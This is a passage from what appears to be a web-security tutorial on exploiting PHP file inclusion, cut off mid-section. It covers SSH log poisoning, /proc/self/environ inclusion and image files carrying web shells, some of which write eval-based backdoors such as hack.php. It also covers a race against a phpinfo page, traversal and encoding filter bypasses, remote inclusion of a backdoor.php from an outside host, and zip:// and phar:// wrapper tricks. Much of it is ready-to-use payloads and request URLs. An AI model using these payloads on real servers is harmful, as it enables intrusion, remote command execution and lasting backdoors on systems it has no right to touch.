&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Connect via SSH:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;ssh &lt;span class="s1"&gt;'&amp;lt;?php phpinfo(); ?&amp;gt;'&lt;/span&gt;@remotehost
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Enter any password. The failed login attempt is logged together with the supplied username, so the PHP code ends up in the SSH log.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fafuebui1w87pfdfwg1h7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fafuebui1w87pfdfwg1h7.png" alt=" " width="798" height="111"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then include the log file.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxbs4mbkjfoevl8uxf4c8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxbs4mbkjfoevl8uxf4c8.png" alt=" " width="607" height="170"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Replace &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; with the desired PHP code.&lt;/p&gt;

&lt;h3&gt;
  
  
  Including environ
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;PHP runs as CGI (so that &lt;code&gt;environ&lt;/code&gt; retains the User-Agent header).&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;environ&lt;/code&gt; file location is known and readable. Default: &lt;code&gt;/proc/self/environ&lt;/code&gt; (Linux only; not available on Windows).&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;code&gt;/proc/self/environ&lt;/code&gt; exposes the process environment, which under CGI includes the request's User-Agent header. Place PHP code in the User-Agent, then include the file.&lt;/p&gt;

&lt;p&gt;Example: intercept a request with Burp and modify the User-Agent:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foii3exscy8q4kjd2prke.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foii3exscy8q4kjd2prke.png" alt=" " width="800" height="212"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then include &lt;code&gt;/proc/self/environ&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqzl74csp73b09i6eczs8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fqzl74csp73b09i6eczs8.png" alt=" " width="482" height="148"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Replace &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt; with the desired PHP code.&lt;/p&gt;

&lt;h3&gt;
  
  
  Including fd (File Descriptors)
&lt;/h3&gt;

&lt;p&gt;File descriptors (fd) are non-negative integers that the kernel returns when a file is opened. Default location: &lt;code&gt;/proc/self/fd/&lt;/code&gt; (Linux only). The technique is analogous to including &lt;code&gt;environ&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Note on Command Execution and Trojan Writing:&lt;/strong&gt; Same as including &lt;code&gt;environ&lt;/code&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Including Uploaded Files
&lt;/h3&gt;

&lt;p&gt;Many websites offer file upload (e.g., avatars, documents). Upload a web shell disguised as an image.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt; Know the uploaded file's path and name.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Create an image-based web shell in two steps:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Using the command line: combine a legitimate image (&lt;code&gt;1.jpg&lt;/code&gt;) with a PHP file (&lt;code&gt;2.php&lt;/code&gt;) containing &lt;code&gt;fputs(fopen('hack.php','w'),'&amp;lt;?php @eval($_POST[v])?&amp;gt;');?&amp;gt;&lt;/code&gt;:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;   copy 1.jpg/b+2.php 3.jpg
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;ol&gt;
&lt;li&gt;Upload &lt;code&gt;3.jpg&lt;/code&gt; to the server (e.g., &lt;code&gt;/upload/202107.jpg&lt;/code&gt;). Then include it:
&lt;/li&gt;
&lt;/ol&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;   http://x.x.x.x/index.php?page=./upload/202107.jpg
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This creates &lt;code&gt;hack.php&lt;/code&gt; in the same directory as &lt;code&gt;index.php&lt;/code&gt;; that file can then be accessed with a web shell management tool.&lt;/p&gt;

&lt;p&gt;Command execution is also possible.&lt;/p&gt;

&lt;h3&gt;
  
  
  Including Temporary Files
&lt;/h3&gt;

&lt;p&gt;Principle diagram:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi60244uwiw0jcxr8l956.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fi60244uwiw0jcxr8l956.png" alt=" " width="799" height="458"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;When PHP handles a file upload, it first writes a temporary file (Linux: &lt;code&gt;/tmp/php[6 random chars]&lt;/code&gt;, Windows: &lt;code&gt;c:\windows\temp&lt;/code&gt;). The attacker must race to include this temporary file before PHP deletes it.&lt;/p&gt;

&lt;p&gt;The temporary filename can either be guessed (weak randomness on Linux; only 65535 possibilities on Windows) or read from a &lt;code&gt;phpinfo&lt;/code&gt; page, whose PHP variables section exposes the uploaded file's temporary path and name.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Requirements:&lt;/strong&gt; &lt;code&gt;phpinfo&lt;/code&gt; page and file inclusion vulnerability.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Principle:&lt;/strong&gt;&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;When a POST request carries a file part, PHP saves it to a temporary file (e.g., &lt;code&gt;/tmp/phpXXXXXX&lt;/code&gt;) that is deleted once the request completes.&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;phpinfo&lt;/code&gt; displays all variables, including &lt;code&gt;$_FILES&lt;/code&gt;, revealing the temporary filename.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;&lt;strong&gt;Technique (Linux only):&lt;/strong&gt; Use the script from &lt;a href="https://github.com/vulhub/vulhub/blob/master/php/inclusion/exp.py" rel="noopener noreferrer"&gt;vulhub/exp.py&lt;/a&gt;. It includes the temporary file, which contains:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt; &lt;span class="nf"&gt;fileputcontents&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;'/tmp/p'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;'&amp;lt;?=eval($_REQUEST[1])?&amp;gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Successful inclusion creates a permanent file &lt;code&gt;/tmp/p&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4y5wof8nqniwmrsd4oqe.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4y5wof8nqniwmrsd4oqe.png" alt=" " width="800" height="188"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Then include &lt;code&gt;/tmp/p&lt;/code&gt; to execute arbitrary commands.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7b52at99u3o1w0jplwp3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F7b52at99u3o1w0jplwp3.png" alt=" " width="800" height="132"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The script exploits a race condition: it sends a large request to the &lt;code&gt;phpinfo&lt;/code&gt; page, padded with filler so that the response exceeds PHP's output buffer (default 4096 bytes). It reads the socket in 4096-byte chunks and, as soon as the temporary filename appears, sends the inclusion request before the first connection closes (while the temporary file still exists).&lt;/p&gt;

&lt;h3&gt;
  
  
  Other Inclusion Techniques
&lt;/h3&gt;

&lt;p&gt;Web applications may rely on other services (FTP, databases) that write files of their own. Each case needs its own analysis (e.g., SMTP logs) and is not covered here.&lt;/p&gt;

&lt;h2&gt;
  
  
  Bypass Techniques
&lt;/h2&gt;

&lt;p&gt;In real scenarios, inclusion is rarely as simple as &lt;code&gt;include $_GET['file'];&lt;/code&gt;. Often, prefixes and suffixes are added. Example:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'file'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="s1"&gt;'/var/www/html/'&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="s1"&gt;'/test/test.php'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Bypassing a Fixed Prefix
&lt;/h3&gt;

&lt;p&gt;Test code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'file'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="s1"&gt;'/var/www/html/'&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;(Note: On Windows, backslashes in the prefix may cause issues; use forward slashes for directory traversal.)&lt;/p&gt;

&lt;h4&gt;
  
  
  Solution: Directory Traversal
&lt;/h4&gt;

&lt;p&gt;If &lt;code&gt;/var/log/test.txt&lt;/code&gt; contains &lt;code&gt;&amp;lt;?php phpinfo();?&amp;gt;&lt;/code&gt;, use &lt;code&gt;../&lt;/code&gt;:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;include.php?file&lt;span class="o"&gt;=&lt;/span&gt;../../log/test.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The server concatenates to &lt;code&gt;/var/www/html/../../log/test.txt&lt;/code&gt; → &lt;code&gt;/var/log/test.txt&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flgx7pvcsh0eeu0waxok6.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flgx7pvcsh0eeu0waxok6.png" alt=" " width="798" height="118"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Solution: Encoding Bypass
&lt;/h4&gt;

&lt;p&gt;Servers often filter &lt;code&gt;../&lt;/code&gt;; the following encodings may bypass such filters:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;1. URL encoding&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;../&lt;/code&gt; → &lt;code&gt;%2e%2e%2f&lt;/code&gt;, &lt;code&gt;..%2f&lt;/code&gt;, &lt;code&gt;%2e%2e/&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;..\&lt;/code&gt; → &lt;code&gt;%2e%2e%5c&lt;/code&gt;, &lt;code&gt;..%5c&lt;/code&gt;, &lt;code&gt;%2e%2e\&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;2. Double encoding&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;../&lt;/code&gt; → &lt;code&gt;%252e%252e%252f&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;..\&lt;/code&gt; → &lt;code&gt;%252e%252e%255c&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;3. Container/server‑specific encoding&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;..%c0%af&lt;/code&gt; (see &lt;a href="https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work" rel="noopener noreferrer"&gt;Why does Directory traversal attack %C0%AF work?&lt;/a&gt;)&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;%c0%ae%c0%ae/&lt;/code&gt; (Java: &lt;code&gt;%c0%ae&lt;/code&gt; → &lt;code&gt;\uC0AE&lt;/code&gt; → &lt;code&gt;.&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;&lt;code&gt;..%c1%9c&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Bypassing a Fixed Suffix
&lt;/h3&gt;

&lt;p&gt;Test code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'file'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="s1"&gt;'/test/test.php'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  Solution: URL Query and Fragment
&lt;/h4&gt;

&lt;p&gt;URL format: &lt;code&gt;protocol://hostname[:port]/path[;parameters][?query]#fragment&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;For RFI (&lt;code&gt;allow_url_fopen=On&lt;/code&gt;, &lt;code&gt;allow_url_include=On&lt;/code&gt;):&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique 1: Query (&lt;code&gt;?&lt;/code&gt;)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;index.php?file&lt;span class="o"&gt;=&lt;/span&gt;http://remoteaddr/remoteinfo.txt?
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Included file becomes &lt;code&gt;http://remoteaddr/remoteinfo.txt?/test/test.php&lt;/code&gt; – the suffix is treated as a query.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Command execution / Trojan writing example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;http://x.x.x.x/fileinclude2.php?file=http://x.x.x.x/backdoor.php?
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;where &lt;code&gt;backdoor.php&lt;/code&gt; contains &lt;code&gt;&amp;lt;?php system('whoami'); ?&amp;gt;&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7impqvociy002tje8yy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fq7impqvociy002tje8yy.png" alt=" " width="799" height="184"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Replace with a web‑shell writing payload to get a shell.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique 2: Fragment (&lt;code&gt;#&lt;/code&gt; or &lt;code&gt;%23&lt;/code&gt;)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight perl"&gt;&lt;code&gt;&lt;span class="nb"&gt;index&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;php&lt;/span&gt;&lt;span class="p"&gt;?&lt;/span&gt;&lt;span class="nv"&gt;file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="nv"&gt;http:&lt;/span&gt;&lt;span class="sr"&gt;//&lt;/span&gt;&lt;span class="nv"&gt;remoteaddr&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="nv"&gt;remoteinfo&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="nv"&gt;txt&lt;/span&gt;&lt;span class="o"&gt;%&lt;/span&gt;&lt;span class="mi"&gt;23&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Included file: &lt;code&gt;http://remoteaddr/remoteinfo.txt#/test/test.php&lt;/code&gt; – the suffix becomes a fragment. URL-encode &lt;code&gt;#&lt;/code&gt; as &lt;code&gt;%23&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Command execution example:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight http"&gt;&lt;code&gt;&lt;span class="err"&gt;http://x.x.x.x/fileinclude2.php?file=http://x.x.x.x/backdoor.php%23
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Difference between Windows and Linux:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Linux works as above.&lt;/li&gt;
&lt;li&gt;On Windows, both &lt;code&gt;?&lt;/code&gt; and &lt;code&gt;#&lt;/code&gt; (even unencoded) work; no special encoding needed.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwef59k8pmdosfr58zmug.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fwef59k8pmdosfr58zmug.png" alt=" " width="800" height="156"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23qod72s857mq0p4f57t.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F23qod72s857mq0p4f57t.png" alt=" " width="799" height="206"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h4&gt;
  
  
  Solution: Using Pseudo‑Protocols
&lt;/h4&gt;

&lt;p&gt;Test code with suffix:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight php"&gt;&lt;code&gt;&lt;span class="cp"&gt;&amp;lt;?php&lt;/span&gt;
    &lt;span class="nv"&gt;$file&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nv"&gt;$_GET&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;'file'&lt;/span&gt;&lt;span class="p"&gt;];&lt;/span&gt;
    &lt;span class="k"&gt;include&lt;/span&gt; &lt;span class="nv"&gt;$file&lt;/span&gt;&lt;span class="mf"&gt;.&lt;/span&gt;&lt;span class="s1"&gt;'/test/test.php'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;?&amp;gt;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Technique 1: &lt;code&gt;zip://&lt;/code&gt;&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Construct a ZIP archive (e.g., &lt;code&gt;J0.zip&lt;/code&gt;) whose inner file name is chosen with the appended suffix &lt;code&gt;/test/test.php&lt;/code&gt; in mind, since the include is &lt;code&gt;$file . '/test/test.php'&lt;/code&gt;. In the example, &lt;code&gt;J0.zip&lt;/code&gt; contains a single file &lt;code&gt;J0&lt;/code&gt; (no extension) holding &lt;code&gt;&amp;lt;?php phpinfo(); ?&amp;gt;&lt;/code&gt;, and the request is &lt;code&gt;fileinclude2.php?file=zip://D:\phpStudy\PHPTutorial\WWW\J0.zip%23J0&lt;/code&gt;. After concatenation the included path is &lt;code&gt;zip://D:\phpStudy\PHPTutorial\WWW\J0.zip#J0/test/test.php&lt;/code&gt;. This works because the pseudo‑protocol treats everything after &lt;code&gt;#&lt;/code&gt; as the inner file path.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxobc11euk8b5auwk01mx.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fxobc11euk8b5auwk01mx.png" alt=" " width="800" height="320"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Test content:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2h0anwy0qirt9np6ypdb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2h0anwy0qirt9np6ypdb.png" alt=" " width="800" height="305"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Technique 2: &lt;code&gt;phar://&lt;/code&gt;&lt;/strong&gt; (requires PHP &amp;gt;= 5.3.4)&lt;/p&gt;

&lt;p&gt;Using the same ZIP archive. Absolute path:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight cpp"&gt;&lt;code&gt;&lt;span class="n"&gt;fileinclude2&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;php&lt;/span&gt;&lt;span class="o"&gt;?&lt;/span&gt;&lt;span class="n"&gt;file&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;phar&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="c1"&gt;//D:\phpStudy\PHPTutorial\WWW\J0.zip\J0&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Concatenated: &lt;code&gt;phar://D:\phpStudy\PHPTutorial\WWW\J0.zip\J0/test/test.php&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flaeusq6rxw0wvynvd1jn.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flaeusq6rxw0wvynvd1jn.png" alt=" " width="800" height="300"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Relative path:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
